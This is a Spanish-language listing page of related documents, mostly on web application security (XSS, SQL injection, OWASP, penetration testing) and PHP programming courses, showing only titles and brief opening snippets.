DOCS. Pautas básicas para el DESARROLLO DE PLUGINS Pautas básicas para el DESARROLLO DE PLUGINS ÍNDICE 1. Protección contra CSRF............................. 2. Protección XSS.................................... 3. Protección contra inyecciones SQL6...................

Más detalles

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web

Ataques específicos a servidores y clientes web y medidas preventivas. Problemas de seguridad Web Problemas de seguridad Web Ataques específicos a servidores y clientes web y medidas preventivas. junio de 2014 Problemas de seguridad Web 1 ATAQUES Consiste en aprovechar alguna debilidad o vulnerabilidad

Más detalles

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org

LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES. www.owasp.org LOS 7 PECADOS DEL DESARROLO WEB & TENTACIÓN DEL USUARIOS EN APLICACIONES MOVILES www.owasp.org Quien soy? Ing. Elvin Vidal Mollinedo Mencia Profesional de seguridad + 9 años de experiencia en desarrollo

Más detalles

Gastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia

Gastón Toth gaston.toth@owasp.org. Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Gastón Toth gaston.toth@owasp.org Lic. en Computación CEH Pentester Desarrollador @OWASP_Patagonia Dónde queda OWASP Patagonia? Webapp pentesting...desde un enfoque no muy técnico Penetration testing

Más detalles

RETO HACKER DE VERANO

RETO HACKER DE VERANO RETO HACKER DE VERANO Blind XPath Reto Hacker de verano Índice 1 Introducción... 2 2 Proceso de trabajo... 2 2.1 Toma de contacto (fingerprinting)... 2 2.2 Comienza el ataque... 4 2.3 Explicacion del ataque

Más detalles

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web

Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web ASIT 20070501 CT Pautas de seguridad para aplicaciones web v1 2007-05-16 Documento de Circular de Tecnología Pautas de seguridad para el desarrollo de aplicaciones Web Versión 01 ARCHIVO: ASIT 20070501

Más detalles

Novedades ebd versión 3.2

Novedades ebd versión 3.2 Novedades ebd versión 3.2 En este documento se detallan los cambios más importantes realizados en la versión 3.2 de ebd. Además de estas modificaciones, se han implementado mejoras de rendimiento y corregido

Más detalles

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es

Cross Site Scripting. Conceptos Básicos y Casos prácticos. Antonio González Castro www.noveria.es antonio@noveria.es Cross Site Scripting Conceptos Básicos y Casos prácticos Antonio González Castro www.noveria.es antonio@noveria.es # Definición Cross Site Scripting o también conocido como XSS por sus siglas en inglés,

Más detalles

Su Seguridad es Nuestro Éxito

Su Seguridad es Nuestro Éxito Su Seguridad es Nuestro Éxito c. Santander, 101. Edif. A. 2º I 08030 Barcelona I Tel.: 93 305 13 18 I Fax: 93 278 22 48 I info@isecauditors.com I www.isecauditors.com OWASP Conference 2007 Barcelona, Julio

Más detalles

About Me. Mario Robles Tencio

About Me. Mario Robles Tencio About Me Mario Robles Tencio Profesional de seguridad +10 años de experiencia en tema de seguridad de redes, desarrollo de aplicaciones web, seguridad de aplicaciones web, PenTesting (Ethical Hacking)

Más detalles

Técnicas y Procedimientos para la realización de Test de Intrusión

Técnicas y Procedimientos para la realización de Test de Intrusión Extrelan 2008 Cáceres. Marzo de 2008 Técnicas y Procedimientos para la realización de Test de Intrusión SG6 Soluciones Globales en Seguridad de la Información http://www.sg6.es INDICE DE CONTENIDOS Primera

Más detalles

CURSO DE PROGRAMACIÓN PHP MySQL

CURSO DE PROGRAMACIÓN PHP MySQL CURSO DE PROGRAMACIÓN PHP MySQL MASTER EN PHP MÓDULO NIVEL BASICO PRIMER MES Aprende a crear Sitios Web Dinámicos con PHP y MySQL 1. Introducción Qué es PHP? Historia Por qué PHP? Temas de instalación

Más detalles

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web

Máster Profesional en Tecnologías de Seguridad. Seguridad en la web Máster Profesional en Tecnologías de Seguridad Módulo VI - Programación Segura Seguridad en la web @josereyero http://www.reyero.net consulting@reyero.net Seguridad en la Web Introducción y objetivos Programa

Más detalles

Programación páginas web JavaScript y PHP

Programación páginas web JavaScript y PHP Programación páginas web JavaScript y PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la

Más detalles

FORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB.

FORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB. FORMACIÓN PRESENCIAL ESPECIALIZADA - SEGURIDAD EN ENTORNOS WEB - AUDITOR DE SEGURIDAD EN ENTORNOS WEB. MODULO I ENTORNO DE DESARROLLO WEB. MYSQL+PHP AUDITOR DE SEGURIDAD EN ENTORNOS WEB. MODULO II - HACKING

Más detalles

abacformacio@abacformacio.com

abacformacio@abacformacio.com Programación de páginas web con PHP Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología

Más detalles

Securiza tu red con Snort y sus amigos

Securiza tu red con Snort y sus amigos www.securityartwork.es www.s2grupo.es Securiza tu red con Snort y sus amigos José Luis Chica Uribe Técnico de seguridad IT jchica@s2grupo.es Índice Seguridad: conceptos Tipos de ataques Cómo defenderse?

Más detalles

MAESTRO DE PHP PHP NIVEL 1

MAESTRO DE PHP PHP NIVEL 1 MAESTRO DE PHP MAESTRO DE PHP es el curso más completo diseñado para que aprendas desde 0 hasta poder desarrollar aplicaciones robustas utilizando Frameworks. Incluye los Cursos PHP Nivel 1 y PHP Avanzado

Más detalles

Catalogo cursos de Seguridad Informática

Catalogo cursos de Seguridad Informática Catalogo cursos de Seguridad Informática 1. Curso de Desarrollo Web Seguro Tema 1 El entorno Web 1.1 Introducción Introducción Arquitectura Web Problemas de seguridad más habituales: Comprensión de las

Más detalles

Bypass WAFs KUNAK CONSULTING. Automatizando SQLi con Python. Omar Palomino. omarc320@gmail.com. opalomino@kunak.com.pe. http://www.el-palomo.

Bypass WAFs KUNAK CONSULTING. Automatizando SQLi con Python. Omar Palomino. omarc320@gmail.com. opalomino@kunak.com.pe. http://www.el-palomo. Bypass WAFs KUNAK CONSULTING Automatizando SQLi con Python Noviembre, 2013 Omar Palomino omarc320@gmail.com opalomino@kunak.com.pe ÍNDICE 1.Inyecciones SQL 2.Inyecciones manuales vs herramientas 3.Nuevos

Más detalles

SQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática.

SQL INJECTION. Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián. 66.69 Criptografía y Seguridad Informática. SQL INJECTION Benitez, Marcelo Chinikailo, Cristian De la Cruz, Leonardo Klas, Julián Grupo 5 66.69 Criptografía y Seguridad Informática Introducción 2 Ataque basado en inyección de código Explota omisiones

Más detalles

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web

AGENDA. Mejorando la Seguridad en Aplicaciones Web. Introducción. La Web Promesas y Amenazas. Asegurando la Red y el Servidor de Web Universidad ORT Uruguay Mejorando la Seguridad en Aplicaciones Web Ing. Cecilia Belletti Ing. Angel Caffa, MSc Ing. Isaac Rodríguez IntegraTICs 7 de diciembre, 2006 AGENDA Introducción La Web Promesas

Más detalles

Inseguridad de los sistemas de autenticación en aplicaciones web

Inseguridad de los sistemas de autenticación en aplicaciones web Barcelona, 18 de Marzo Inseguridad de los sistemas de autenticación Vicente Aguilera Díaz vaguilera@isecauditors.com Contenido 0. Introducción al sistema de autenticación 2. Medidas de protección 3. Referencias

Más detalles

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez

Seguridad en Sitios Web de Alto Tráfico. Ing. Enrique Hurtarte Juárez Seguridad en Sitios Web de Alto Tráfico Ing. Enrique Hurtarte Juárez Guatemala, 24 de Julio de 2014 XumaK Quienes somos XumaK es una empresa que fue fundada en 2003 por Marcos Andres como una de las primeras

Más detalles

PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1

PHP. Introducción (1) Introducción (3) Introducción (2) PHP 1 Introducción (1) Personal Home Page Qué es? Acrónimo de : Hypertext Preprocessor. Lenguaje interpretado de alto nivel que permite desarrollar fácilmente páginas dinámicas. Similar a los lenguajes C y Perl.

Más detalles

PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP

PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP PROGRAMACIÓN PÁGINAS WEB JAVASCRIPT Y PHP OBJETIVOS Estudiar la programación de la parte cliente con JavaScript y la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos

Más detalles

Seguridad WEB Inyección de código

Seguridad WEB Inyección de código Seguridad WEB Inyección de código Maestría en TICs 2015 Énfasis Auditoría y Seguridad Informática Seguridad en aplicaciones y base de datos Cristian Cappo (ccappo@pol.una.py) NIDTEC - Núcleo de Investigación

Más detalles

Programación páginas web. Servidor (PHP)

Programación páginas web. Servidor (PHP) Programación páginas web. Servidor (PHP) Curso de desarrollo de aplicaciones web. Para ello se estudia la programación de la parte servidor con la tecnología PHP y el servidor de bases de datos MySQL.

Más detalles

ARE YOUR WEB VULNERABLE?

ARE YOUR WEB VULNERABLE? CROSS-SITE SITE SCRIPTING: ARE YOUR WEB APPLICATIONS VULNERABLE? Alberto Calle Alonso Sebastián Marcos Miguel Mateo de la Puente Madrid, Febrero 2009 1 ÍNDICE Introducción Cross-site scripting HTTP y HTML

Más detalles

Tema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión

Tema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión Tema 6 SSI T. intrusión Tipos Metodologías Fases Tema 6. Seguridad Perimetral Parte 3. Análisis de seguridad en redes Tests de intrusión Seguridad en Sistemas Informáticos Noviembre-2012 Tema 6 SSI Contenido

Más detalles

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15

SEGURIDAD SEGURIDAD. Guía de Comunicación Digital para La Administración General del Estado. Página 1 de 15 Página 1 de 15 REQUISITOS ANTES DE TENER EL SITIO WEB 3 5. 3 5.1 INYECCIÓN DE CÓDIGO 5 5.2. SECUENCIA DE COMANDOS EN SITIOS CRUZADOS (CROSS SITE SCRIPTING XSS) 7 5.3. PÉRDIDA DE AUTENTICACIÓN Y GESTIÓN

Más detalles

Blind SQL Injectión. Práctico

Blind SQL Injectión. Práctico Blind SQL Injectión Práctico 1 Hola: Hace unos días prometí que publicaría un documento en el foro que nos ayudaría a entender mejor un Blind SQL Injection. La idea principal no es explicar un Blind SQL

Más detalles

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría

OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web. The OWASP Foundation. Felipe Zipitría OWASP Top 10 2013 Los diez riesgos más importantes en aplicaciones web Felipe Zipitría OWASP/ GSI- Facultad de Ingeniería felipe.zipitria@owasp.org Copyright The OWASP Foundation Permission is granted

Más detalles

Aplicaciones Web (Curso 2015/2016)

Aplicaciones Web (Curso 2015/2016) Seguridad en Aplicaciones Web Aplicaciones Web (Curso 2015/2016) Jesús Arias Fisteus // jaf@it.uc3m.es Seguridad en Aplicaciones Web p. 1 Seguridad en aplicaciones Web «This site is absolutely secure.

Más detalles

Recomendaciones de Seguridad para Web sites implementados bajo Joomla!

Recomendaciones de Seguridad para Web sites implementados bajo Joomla! Recomendaciones de Seguridad para Web sites implementados bajo Joomla! Dirigido a: Secretarías de Educación que hacen uso del servicio de Web Hosting proporcionado por el Ministerio de Educación Nacional

Más detalles

Introducción al desarrollo web (idesweb)

Introducción al desarrollo web (idesweb) Introducción al desarrollo web (idesweb) Práctica 8: PHP 2 (cookies y sesiones) 1. Objetivos Conocer el concepto de cookie y sus posibles usos. Aprender a utilizar las cookies con PHP. Conocer el concepto

Más detalles

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting

WAPITI. Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad. VI OWASP Spain Chapter Meeting ARGENTINA COLOMBIA CHILE ESPAÑA EE.UU. MÉXICO PANAMÁ VENEZUELA David del Pozo González dpozog@grupogesfor.com WAPITI Escaner de vulnerabilidades de aplicaciones web y auditor de seguridad Junio 2010 www.gesfor.es

Más detalles

Desarrollo y servicios web

Desarrollo y servicios web Desarrollo y servicios web Luisa Fernanda Rincón Pérez 2015-1 Qué vimos la clase pasada? 1. Fin tutorial HTML 2. Nombres de dominio 3. URLs 3 Sesión 4. Método GET - POST Qué haremos hoy? 1. Tipos de solicitudes

Más detalles

Seguridad de un Portal

Seguridad de un Portal Seguridad de un Portal 5 de noviembre, 2010 Gabriel Fernández NyF@agesic.gub.uy Qué debemos proteger? Información Disponibilidad http://moplincom.moplin.com/wp-content/uploads/2009/08/joke-redes1.jpg 2

Más detalles

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN

Capítulo 4 Pruebas e implementación de la aplicación CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CAPÍTULO 4 PRUEBAS E IMPLEMENTACIÓN DE LA APLICACIÓN CONCEPTOS DE PRUEBAS DE APLICACIÓN El departamento de Testing se encarga de diseñar, planear y aplicar el rol de pruebas a los sistemas que el PROVEEDOR

Más detalles

FORMACIÓN ESPECIALIZADA EN HERRAMIENTAS Y LENGUAJES DE PROGRAMACIÓN WEB

FORMACIÓN ESPECIALIZADA EN HERRAMIENTAS Y LENGUAJES DE PROGRAMACIÓN WEB HERRAMIENTAS Y LENGUAJES DE PROGRAMACIÓN WEB La consolidación de los medios online como soporte principal de comunicación, así como la coyuntura económica, que relega a los soportes publicitarios convencionales

Más detalles

Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL BÁSICO

Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL BÁSICO Presentación del Curso Virtual PROGRAMACIÓN WEB PHP CON MYSQL BÁSICO INNOVATIVA CENTRO DE TRANSFERENCIA Y DESARROLLO TECNOLÓGICO ESPE CECAI Capacitación Virtual La mejor opción para su crecimiento profesional

Más detalles

Ejemplo de aplicación PHP: Tienda

Ejemplo de aplicación PHP: Tienda Ejemplo de aplicación PHP: Tienda Aplicaciones Web/Sistemas Web Juan Pavón Mestras Dep. Ingeniería del Software e Inteligencia Artificial Facultad de Informática Universidad Complutense Madrid Material

Más detalles

Inyección SQL. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012

Inyección SQL. Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Inyección SQL Juan Manuel Espinoza Marquez juanmanuel.espinoza@gmail.com CFT San Agustín Linares -2012 Introducción Una inyección SQL sucede cuando se inserta o "inyecta" un código SQL "invasor" dentro

Más detalles

MASTER DE PHP es el curso más completo diseñado para que aprendas desde 0 hasta poder desarrollar aplicaciones robustas utilizando Frameworks.

MASTER DE PHP es el curso más completo diseñado para que aprendas desde 0 hasta poder desarrollar aplicaciones robustas utilizando Frameworks. MASTER DE PHP es el curso más completo diseñado para que aprendas desde 0 hasta poder desarrollar aplicaciones robustas utilizando Frameworks. Incluye los Cursos PHP Nivel 1 y PHP Avanzado y entrenamiento

Más detalles

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web

Segurinfo NOA 2011. Seguridad en el desarrollo de aplicaciones Web Segurinfo NOA 2011 Seguridad en el desarrollo de aplicaciones Web Hernán Santiso Gerente de Seguridad de la Información Claro Argentina, Uruguay y Paraguay hsantiso@claro.com.ar Introducción El problema

Más detalles

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica

Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica Día 23, Hacking ético: Auditoria web y perspectiva desde la Administración Publica DANIEL FIRVIDA PEREIRA Técnico de seguridad - INTECO-CERT 23 de Noviembre 1º ENCUENTRO NACIONAL DE LA INDUSTRIA DE SEGURIDAD

Más detalles

8º Unidad Didáctica PHP. Eduard Lara

8º Unidad Didáctica PHP. Eduard Lara 8º Unidad Didáctica PHP Eduard Lara 1 ÍNDICE 8.1 Lenguajes de script del servidor PHP 8.2 Sintaxis básica de PHP 8.3 La instrucción include 8.4 Cookies y sesiones 8.5 Bases de datos. Interacción con MySQL

Más detalles

GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB

GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB GUÍA DE SEGURIDAD DE LAS TIC (CCN-STIC-812) SEGURIDAD EN ENTORNOS Y APLICACIONES WEB OCTUBRE DE 2011 Edita: Editor y Centro Criptológico Nacional, 2011 NIPO: 076-11-053-3 Tirada: 1000 ejemplares Fecha

Más detalles

Lección 7: INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL

Lección 7: INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL Lección 7: INTRODUCCIÓN A LAS TÉCNICAS DE INYECCIÓN SQL Chema Alonso chema@informatica64.com Informática 64 Microsoft MVP en Enterprise Security Incidentes de Seguridad I: Kaspersky 2 Incidentes de Seguridad

Más detalles

Internal Hacking y contramedidas en entorno Windows Pirateo interno, medidas de protección, desarrollo de herramientas

Internal Hacking y contramedidas en entorno Windows Pirateo interno, medidas de protección, desarrollo de herramientas Introducción 1. Preámbulo 15 2. Desciframiento de un ataque conseguido 17 3. Descifrado de contramedidas eficaces 18 3.1 Análisis de riesgos reales 18 3.2 Consideraciones técnicas 19 3.3 Consideraciones

Más detalles

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle

Desarrollo seguro en Drupal. Ezequiel Vázquez De la calle Sobre mi Estudios Ingeniero Técnico en Informática - UCA Máster en Ingeniería del Software - US Experto en Seguridad de las TIC - US Experiencia Aficiones 3+ años como desarrollador web, casi 2 en Drupal

Más detalles

Guía práctica PHP 6. (c) Francisco Charte Ojeda

Guía práctica PHP 6. (c) Francisco Charte Ojeda Guía práctica PHP 6 Agradecimientos Sobre el autor (c) Francisco Charte Ojeda Introducción Páginas de servidor PHP Creación de páginas PHP Cómo usar este libro Convenciones tipográficas 1. Instalación

Más detalles

Seguridad en Sistemas Informáticos (SSI) Programación Segura

Seguridad en Sistemas Informáticos (SSI) Programación Segura 1 Seguridad en Sistemas Informáticos (SSI) Programación Segura Carlos Pérez Conde Departament d'informàtica Escola Técnica Superior d'enginyeria Universitat de València 2 Bibliografía específica OWASP

Más detalles

Principales vulnerabilidades en aplicaciones Web. Christian Martorella Edge-security.com

Principales vulnerabilidades en aplicaciones Web. Christian Martorella Edge-security.com Principales vulnerabilidades en aplicaciones Web Christian Martorella Edge-security.com 1 #Whoami: Christian Martorella Cofundador Edge-security.com CISSP, CISM, CISA, OPST, OPSA Actualmente trabajando

Más detalles

Auditoría de Seguridad

Auditoría de Seguridad Auditoría de Seguridad Introducción Tipos auditoría Externa Caja Negra Interna Caja Blanca Informes Valoración sistema Oferta y Tarificación Recursos Formación - certificaciones Auditoría de Seguridad

Más detalles

HTML, PHP y bases de datos

HTML, PHP y bases de datos HTML, PHP y bases de datos Estrella Pulido Cañabate HTML Estructura de un documento HTML Zen and Tumbolia The Zen monk Bassui wrote a letter to one of his disciples

Más detalles

Capítulo 5: PRUEBAS.

Capítulo 5: PRUEBAS. Capítulo 5: PRUEBAS. 5.1 Objetivos de las pruebas. Objetivos de las pruebas. Hoy en día el tema de la seguridad en software ya no resulta nada nuevo, en los inicios los desarrolladores de software no procuraban

Más detalles

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas

Seguridad en aplicaciones web en el ámbito de la e-administración. Problemas más comunes y principales contramedidas Problemas más comunes y principales contramedidas Seguridad en aplicaciones web Problemas más comunes y principales contramedidas Fernando de la Villa Gerente de Soluciones Area Seguridad Mnemo Evolution

Más detalles

SEGURIDAD ataques riesgos tipos de amenazas

SEGURIDAD ataques riesgos tipos de amenazas SEGURIDAD La seguridad en sistemas es un área de las Ciencias de la Computación que se ocupa de diseñar las normas, procedimientos, métodos y técnicas destinados a conseguir un sistema de información seguro

Más detalles

(Actos no legislativos) REGLAMENTOS

(Actos no legislativos) REGLAMENTOS 18.11.2011 Diario Oficial de la Unión Europea L 301/3 II (Actos no legislativos) REGLAMENTOS REGLAMENTO DE EJECUCIÓN (UE) N o 1179/2011 DE LA COMISIÓN de 17 de noviembre de 2011 por el que se establecen

Más detalles

Pruebas de Penetración contra Aplicaciones Web

Pruebas de Penetración contra Aplicaciones Web Pruebas de Penetración contra Aplicaciones Web Alonso Eduardo Caballero Quezada Consultor en Hacking Ético e Informática Forense e-mail: ReYDeS@gmail.com Sitio Web: www.reydes.com Quién Soy? Alonso Eduardo

Más detalles

Seguridad en Sistemas Informáticos Seguridad y WWW. Mikel Izal Azcárate (mikel.izal@unavarra.es)

Seguridad en Sistemas Informáticos Seguridad y WWW. Mikel Izal Azcárate (mikel.izal@unavarra.es) Seguridad en Sistemas Informáticos Seguridad y WWW Mikel Izal Azcárate (mikel.izal@unavarra.es) Indice Seguridad en WWW > Seguridad en la autentificación > Seguridad en la autorización > Ataques de validación

Más detalles

Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones

Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones Norma: Normas de Seguridad de Datos (DSS) Requisito: 6.6 Fecha: febrero de 2008 Suplemento informativo: aclaración del requisito 6.6 sobre revisiones de códigos y firewalls de aplicaciones Fecha de publicación:

Más detalles

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS

AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS AUDITORÍAS TÉCNICAS PARA LA CERTIFICACIÓN DE LOS SISTEMAS DE RECOGIDA DE INICIATIVAS CIUDADANAS EUROPEAS Las auditorias técnicas según el Reglamento 211/2011 de la Unión Europea y según el Reglamento de

Más detalles

Crear una instalación de WordPress segura v1.1

Crear una instalación de WordPress segura v1.1 Tabla de contenidos: Tabla de contenidos:... 1 Introducción... 2 Instalando WordPress... 2 Accediendo a sus tablas de WordPress... 2 Cambiando el prefijo a sus tablas de WordPress... 3 Antes de instalar...

Más detalles

Análisis de un malware brasileño Qué tienen en común un troyano bancario, Google Chrome y un servidor de gobierno?

Análisis de un malware brasileño Qué tienen en común un troyano bancario, Google Chrome y un servidor de gobierno? Análisis de un malware brasileño Qué tienen en común un troyano bancario, Google Chrome y un servidor de gobierno? Índice Autor:... 2 Co-autores:... 2 Introducción... 3 Instalación: Ingeniería Social y

Más detalles

Kaspersky Fraud Prevention for Endpoints

Kaspersky Fraud Prevention for Endpoints Kaspersky Fraud Prevention for Endpoints www.kaspersky.es KASPERSKY FRAUD PREVENTION 1. Formas de atacar a la banca online El primer motivo del cibercrimen es hacer dinero y las sofisticadas bandas criminales

Más detalles

100% Laboratorios en Vivo

100% Laboratorios en Vivo 100% Laboratorios en Vivo Sabemos que la única forma de aprender es haciendo. Por lo mismo todos los laboratorios son con desafíos de hacking en un ambiente en vivo. Con servidores y servicios dentro de

Más detalles

Escáner de vulnerabilidades para aplicaciones web y gestores de contenido

Escáner de vulnerabilidades para aplicaciones web y gestores de contenido Escáner de vulnerabilidades para aplicaciones web y gestores de contenido Denise Betancourt Sandoval Omar Alí Domínguez Cabañas Rodrigo Augusto Ortiz Ramón Problemática Pruebas de penetración como una

Más detalles

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec

El Hacking Ético y los Grupos Hackitivistas Anonymous y Lulzsec Metodología. www.dsteamseguridad.com La Metodología de la charla esta guiada por el concepto de cada una de las fases de ataque, con su respectiva demostración Arquitectura de Red (Laboratorio Virtual)

Más detalles

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com

http://www.soulblack.com.ar Security Research XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com XSS CROSS SITE SCRIPTING Chebyte chebyte at gmail.com Conceptos XSS: (Cross Site Scripting) tipo de vulnerabilidad surgida como consecuencia de errores de filtrado de las entradas del usuario en aplicaciones

Más detalles

Explotando un RFI en una WebApp Comercial

Explotando un RFI en una WebApp Comercial Explotando un RFI en una WebApp Comercial A. Alejandro Hernández (nitr0us) nitrousenador@gmail.com Safer Operations Consulting www.saferops.com.mx RTM Security Research Group www.zonartm.org Noviembre

Más detalles

PLAN FORMATIVO MODALIDAD I

PLAN FORMATIVO MODALIDAD I PLAN FORMATIVO MODALIDAD I Modalidad Acción: TELEFORMACIÓN Nº de la Acción: FPTO/2014/695/202 Familia Profesional: Tipo Especialidad: IFC / INFORMÁTICA Y COMUNICACIONES NUEVA ESPECIALIDAD Area Profesional:

Más detalles